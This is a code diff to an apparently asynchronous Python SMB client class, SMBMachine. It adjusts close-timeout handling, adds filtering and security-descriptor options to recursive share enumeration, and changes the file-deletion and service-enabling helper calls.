@@ -184,7 +184,10 @@ class SMBMachine:
 		return self
 		
 	async def __aexit__(self, exc_type, exc, traceback):
-		await asyncio.wait_for(self.close(), timeout = 3)
+		try:
+			await asyncio.wait_for(self.close(), timeout = 5)
+		except:
+			pass
 
 	async def close(self):
 		# TODO: make it prettier!
@@ -339,7 +342,7 @@ class SMBMachine:
 		for entry in directory.get_console_output():
 			yield entry
 
-	async def enum_all_recursively(self, depth = 3):
+	async def enum_all_recursively(self, depth = 3, maxentries = None, exclude_share=['print$', 'PRINT$'], exclude_dir=[], fetch_dir_sd = False, fetch_file_sd = False):
 		shares = {}
 		async for share, err in self.list_shares():
 			if err is not None:
@@ -347,16 +350,20 @@ class SMBMachine:
 			if share.name.upper() == 'IPC$':
 				continue
 			shares[share.name] = share
-			yield share.fullpath, 'share', None
+			yield share, 'share', None
 
 		for share_name in shares:
+			if share_name in exclude_share:
+				continue
+
 			_, err = await shares[share_name].connect(self.connection)
 			if err is not None:
 				continue
 				raise err
 
-			async for entry in shares[share_name].subdirs[''].list_r(self.connection, depth = depth):
+			async for entry in shares[share_name].subdirs[''].list_r(self.connection, depth = depth, maxentries = maxentries, fetch_dir_sd = fetch_dir_sd, fetch_file_sd = fetch_file_sd, exclude_dir = exclude_dir):
 				yield entry
+				await asyncio.sleep(0)
 
 	async def put_file(self, local_path, remote_path):
 		"""
@@ -398,7 +405,7 @@ class SMBMachine:
 			yield data, err
 
 	async def del_file(self, file_path):
-		return await SMBFile.delete(self.connection, file_path)
+		return await SMBFile.delete_rempath(self.connection, file_path)
 	
 	async def del_directory_path(self, dir_path):
 		return await SMBDirectory.delete_unc(self.connection, dir_path)
@@ -414,7 +421,7 @@ class SMBMachine:
 
 	@req_servicemanager
 	async def enable_service(self, service_name):
-		res, exc = await rr(self.servicemanager.enable_service(service_name))
+		res, exc = await self.servicemanager.enable_service(service_name)
 		return res, exc
 
 	#@red_gen
